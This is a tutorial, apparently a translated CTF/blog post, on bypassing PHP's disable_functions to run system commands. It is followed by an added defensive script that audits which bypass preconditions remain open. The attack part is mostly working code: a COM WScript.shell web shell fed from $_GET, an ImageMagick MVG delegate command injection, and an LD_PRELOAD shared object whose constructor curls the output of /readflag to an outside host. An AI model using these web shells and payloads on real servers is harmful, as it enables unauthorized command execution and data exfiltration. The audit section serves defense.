
Bypassing PHP disable_functions for command execution

Several ways to get around the PHP disable_functions restriction.

1. Windows COM component
Only works on Windows, mainly with PHP 5.4; on other versions you have to add the extension yourself.
php.ini configuration:

```ini
extension=php_com_dotnet.dll
```

```php
<?php
$command = $_GET['a'];
$wsh = new COM('WScript.shell'); // create a COM object; Shell.Application works as well
$exec = $wsh->exec("cmd /c " . $command); // call the object's method to run the command
$stdout = $exec->StdOut();
$stroutput = $stdout->ReadAll();
echo $stroutput;
?>
```

The definitive fix is to delete the wshom.ocx file from the System32 directory.

2. Using the ImageMagick vulnerability to bypass disable_functions
phpinfo shows the relevant ImageMagick configuration information.

```php
<?php
echo "Disable Functions: " . ini_get('disable_functions') . "\n";

// command comes from argv on the CLI, from ?cmd= on the web
$command = PHP_SAPI == 'cli' ? $argv[1] : $_GET['cmd'];
if ($command == '') {
    $command = 'id';
}

// MVG file whose url() fill smuggles the command into the delegate call
$exploit = <<<EOF
push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg"|$command")'
pop graphic-context
EOF;

file_put_contents("KKKK.mvg", $exploit);
$thumb = new Imagick();
$thumb->readImage('KKKK.mvg');   // parsing the MVG triggers the delegate
$thumb->writeImage('KKKK.png');
$thumb->clear();
$thumb->destroy();
unlink("KKKK.mvg");
unlink("KKKK.png");
?>
```

3. Bypass via the LD_PRELOAD environment variable

```c
#define _GNU_SOURCE
#include <stdlib.h>
#include <stdio.h>
#include <string.h>

/* constructor runs as soon as the shared object is loaded into the process */
__attribute__ ((__constructor__)) void preload (void)
{
    system("curl vps:6666/`/readflag`");
}
```

```sh
gcc a.c -fPIC -shared -o a.so
```

```php
<?php
putenv("LD_PRELOAD=/var/www/html/a.so");
// mail() spawns sendmail, which picks up LD_PRELOAD
mail("[email protected]","","","","");
//error_log('',1);
?>
```

4. pcntl_exec
Version requirement: PHP 4 >= 4.2.0, PHP 5

https://blog.csdn.net/weixin_43999372/article/details/87925442
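As an added defensive example (not part of the original post), the following audit script checks the preconditions of the four routes described above against the running php.ini and reports which ones are still open together with the corresponding hardening step. The function name `auditDisableFunctions` is ours; the policy.xml advice for ImageMagick is a standard mitigation not mentioned on the page.

```php
<?php
// Added example: report which of the four bypass routes above remain
// reachable under the current configuration (function name is ours).
function auditDisableFunctions(): array
{
    $disabled = array_filter(array_map('trim',
        explode(',', (string) ini_get('disable_functions'))));

    // PHP 8 hides disabled functions from function_exists(); older
    // versions only list them in disable_functions, so check both.
    $blocked = function (string $f) use ($disabled): bool {
        return in_array($f, $disabled, true) || !function_exists($f);
    };

    $findings = [];

    // 1. COM component: only reachable when php_com_dotnet is loaded (Windows).
    if (extension_loaded('com_dotnet')) {
        $findings[] = 'COM: com_dotnet is loaded; remove extension=php_com_dotnet.dll'
                    . ' or delete System32\\wshom.ocx';
    }

    // 2. ImageMagick: the Imagick extension exposes the MVG/url() delegate path.
    if (extension_loaded('imagick')) {
        $findings[] = 'Imagick: loaded; update ImageMagick and restrict coders'
                    . ' (MVG, URL, EPHEMERAL, MSL) in policy.xml';
    }

    // 3. LD_PRELOAD: needs putenv() plus a function that spawns a child
    //    (mail() or error_log() with message_type 1).
    if (!$blocked('putenv') && (!$blocked('mail') || !$blocked('error_log'))) {
        $findings[] = 'LD_PRELOAD: putenv() together with mail()/error_log() is enabled;'
                    . ' add putenv to disable_functions';
    }

    // 4. pcntl_exec: frequently missing from disable_functions lists.
    if (!$blocked('pcntl_exec')) {
        $findings[] = 'pcntl_exec: enabled; add pcntl_exec to disable_functions';
    }

    return $findings;
}

$findings = auditDisableFunctions();
echo $findings ? implode("\n", $findings) . "\n" : "No open bypass preconditions found.\n";
```

Run it with the same SAPI you want to audit (php-fpm and the CLI often load different ini files).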